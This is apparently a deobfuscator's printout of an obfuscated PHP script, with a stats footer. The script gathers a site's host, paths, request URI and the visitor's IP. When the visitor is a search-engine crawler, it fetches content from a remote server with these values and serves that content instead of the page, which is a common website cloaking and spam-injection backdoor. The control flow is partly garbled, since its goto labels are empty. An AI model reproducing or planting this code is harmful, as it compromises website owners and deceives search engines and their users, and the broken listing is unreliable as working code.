$_SERVER["\x50\101\124\110\137\x49\116\x46\x4f"] != call_user_func(function () { return hex2bin(''); }) ? $_SERVER["\x50\x41\124\110\x5f\x49\116\x46\117"] : ${call_user_func(function () { return hex2bin("\64\x33\x33\x32\x33\x30"); })} : ${call_user_func(function () { return hex2bin("\x34\x33\63\62\63\x30"); })}; goto ; : ${call_user_func(function () { return hex2bin("\64\64\63\x30\x33\63"); })} = (isset($_SERVER["\110\x54\124\120\123"]) && $_SERVER["\110\x54\x54\120\123"] !== "\x6f\146\x66" ? "\150\x74\x74\x70\x73" : "\150\164\164\160") . "\72\57\57" . ${call_user_func(function () { return hex2bin("\x34\64\x33\60\x33\63"); })}; goto ; : ${call_user_func(function () { $X = pack("\110\66", "\x34\x31\x33\x39\x33\x39"); return $X; })} = isset($_SERVER["\x53\103\x52\x49\x50\124\137\116\101\x4d\x45"]) ? $_SERVER["\x53\x43\x52\x49\x50\124\137\116\x41\115\105"] : str_replace(${call_user_func(function () { return hex2bin("\x34\66\x36\x33\63\64"); })}, call_user_func(function () { return hex2bin(''); }), ${call_user_func(function () { return hex2bin("\x34\x33\x36\66\x33\66"); })}); goto ; : ${call_user_func(function () { return hex2bin("\x34\x31\63\71\63\x39"); })} = preg_replace("\x2f\56\52\x5c\x2f\x28\x2e\52\51\x2f\163\x69", "\x24\x31", ${call_user_func(function () { $X = pack("\x48\x36", "\64\x31\63\71\x33\x39"); return $X; })}); goto ; : ${call_user_func(function () { return hex2bin("\x34\64\x33\x30\63\63"); })} = isset($_SERVER["\x48\x54\124\120\x5f\x48\x4f\123\124"]) ? $_SERVER["\x48\124\x54\x50\x5f\110\117\x53\124"] : $_SERVER["\x53\105\122\126\105\122\137\x4e\101\115\105"]; goto ; : ${call_user_func(function () { return hex2bin("\64\63\x36\66\63\x36"); })} = str_replace("\134", "\57", ${call_user_func(function () { return hex2bin("\64\x33\x36\x36\63\66"); })} == call_user_func(function () { return hex2bin(''); }) || ${call_user_func(function () { return hex2bin("\64\63\66\x36\x33\x36"); })} == "\151\x6e\x64\145\170\56\x70\150\160" ? call_user_func(function () { return hex2bin(''); }) : ${call_user_func(function () { return hex2bin("\x34\x33\x36\x36\x33\66"); })}); goto ; : : goto ; : ${call_user_func(function () { return hex2bin("\x34\x33\x33\x31\63\x39"); })} = "\x72\x65\x71\x75\145\163\x74\x5f\x75\162\154\x3d" . urlencode("{${call_user_func(function () { return hex2bin("\64\x34\63\60\x33\63"); })}}{${call_user_func(function () { return hex2bin("\x34\63\x33\x32\x33\60"); })}}") . "\46\167\x77\x77\x5f\160\141\164\150\x3d" . urlencode(${call_user_func(function () { $X = pack("\110\x36", "\x34\63\x36\66\x33\66"); return $X; })}) . "\46\x63\154\151\145\x6e\164\137\x69\160\x3d" . urlencode(D63()) . "\46\162\x65\x71\165\145\163\x74\x5f\160\x68\x70\75" . urlencode(${call_user_func(function () { return hex2bin("\64\61\63\x39\63\71"); })}) . "\x26\x72\145\x71\165\145\163\x74\137\164\171\160\145\x3d" . urlencode(${call_user_func(function () { return hex2bin("\64\63\x36\64\66\64"); })}); goto ; : : goto ; : ${call_user_func(function () { return hex2bin("\x34\x33\66\x36\63\66"); })} = isset($_SERVER["\x53\x43\x52\x49\x50\x54\137\x46\111\x4c\x45\x4e\x41\115\105"]) ? $_SERVER["\123\x43\122\x49\x50\x54\x5f\x46\111\x4c\x45\x4e\101\115\105"] : __FILE__; goto ; : : goto ; : ${call_user_func(function () { return hex2bin("\x34\63\66\66\63\x36"); })} = ${call_user_func(function () { return hex2bin("\64\x31\x33\71\x33\x39"); })} != call_user_func(function () { return hex2bin(''); }) ? substr(${call_user_func(function () { $X = pack("\x48\66", "\x34\x31\63\x39\63\x39"); return $X; })}, 0, strrpos(${call_user_func(function () { return hex2bin("\64\61\x33\x39\63\x39"); })}, "\x2f")) : (${call_user_func(function () { return hex2bin("\x34\66\66\63\63\64"); })} != call_user_func(function () { return hex2bin(''); }) ? str_replace(${call_user_func(function () { $X = pack("\x48\66", "\64\x36\x36\x33\x33\64"); return $X; })}, call_user_func(function () { return hex2bin(''); }), dirname(${call_user_func(function () { return hex2bin("\x34\63\x36\66\x33\66"); })})) : call_user_func(function () { return hex2bin(''); })); goto ; : ${call_user_func(function () { return hex2bin("\x34\66\66\63\x33\64"); })} = isset($_SERVER["\x44\x4f\103\x55\115\105\x4e\124\137\122\117\x4f\x54"]) ? str_replace("\134", "\x2f", $_SERVER["\104\117\x43\125\115\105\x4e\124\x5f\x52\117\x4f\x54"]) : call_user_func(function () { return hex2bin(''); }); goto ; : : goto ; : ${call_user_func(function () { return hex2bin("\64\63\x33\x32\x33\x30"); })} = isset($_SERVER["\122\105\x51\125\x45\x53\x54\x5f\125\x52\x49"]) ? $_SERVER["\122\x45\121\x55\x45\123\x54\x5f\125\122\111"] : (isset($_SERVER["\x51\x55\x45\x52\131\137\x53\x54\122\x49\116\x47"]) ? $_SERVER["\121\125\x45\122\x59\137\123\x54\122\111\x4e\x47"] : call_user_func(function () { return hex2bin(''); })); goto ; : ${call_user_func(function () { return hex2bin("\x34\61\x33\x39\x33\x39"); })} = ${call_user_func(function () { return hex2bin("\64\x31\63\71\x33\x39"); })} != call_user_func(function () { return hex2bin(''); }) ? substr(${call_user_func(function () { return hex2bin("\x34\61\63\x39\x33\x39"); })}, 1) : ${call_user_func(function () { $X = pack("\x48\x36", "\x34\61\x33\71\x33\71"); return $X; })}; goto ; : : goto ; : ${call_user_func(function () { return hex2bin("\64\61\x33\x39\x33\71"); })} = strtolower(${call_user_func(function () { $X = pack("\110\x36", "\64\61\x33\71\63\71"); return $X; })}) == "\151\x6e\x64\x65\170\x2e\160\150\160" ? call_user_func(function () { return hex2bin(''); }) : ${call_user_func(function () { return hex2bin("\64\x31\63\x39\x33\x39"); })}; goto ; : switch (isset($_SERVER["\x48\124\124\x50\x5f\125\x53\x45\x52\137\101\x47\x45\116\x54"]) && preg_match("\57\x28\147\x6f\x6f\147\x6c\x65\142\157\164\x7c\171\141\x68\x6f\157\x7c\163\154\x75\x72\x70\x7c\x62\141\151\144\165\x73\x70\151\x64\x65\162\x7c\142\151\156\x67\x62\157\x74\x7c\147\157\x6f\x67\x6c\145\174\142\141\151\144\165\x7c\x61\157\x6c\x7c\x62\x69\156\x67\x29\57\163\151", $_SERVER["\x48\124\x54\x50\137\125\123\105\122\137\101\x47\105\116\124"])) { case false: goto ; case true: die(F1A("{${call_user_func(function () { return hex2bin("\x36\x33\63\x31\63\64"); })}}\x3f\162\145\x64\x69\x72\145\x63\x74\x3d\60\x26{${call_user_func(function () { return hex2bin("\64\x33\63\x31\63\x39"); })}}")); goto ; } goto ; : ${call_user_func(function () { return hex2bin("\64\x33\66\x36\63\x36"); })} = str_replace("\134", "\x2f", ${call_user_func(function () { return hex2bin("\64\x33\x36\66\x33\66"); })}); goto ; : }

Function Calls

None

Variables

None

Stats

MD5 402847c56452a029ac7477e6973b1aa7
Eval Count 0
Decode Time 54 ms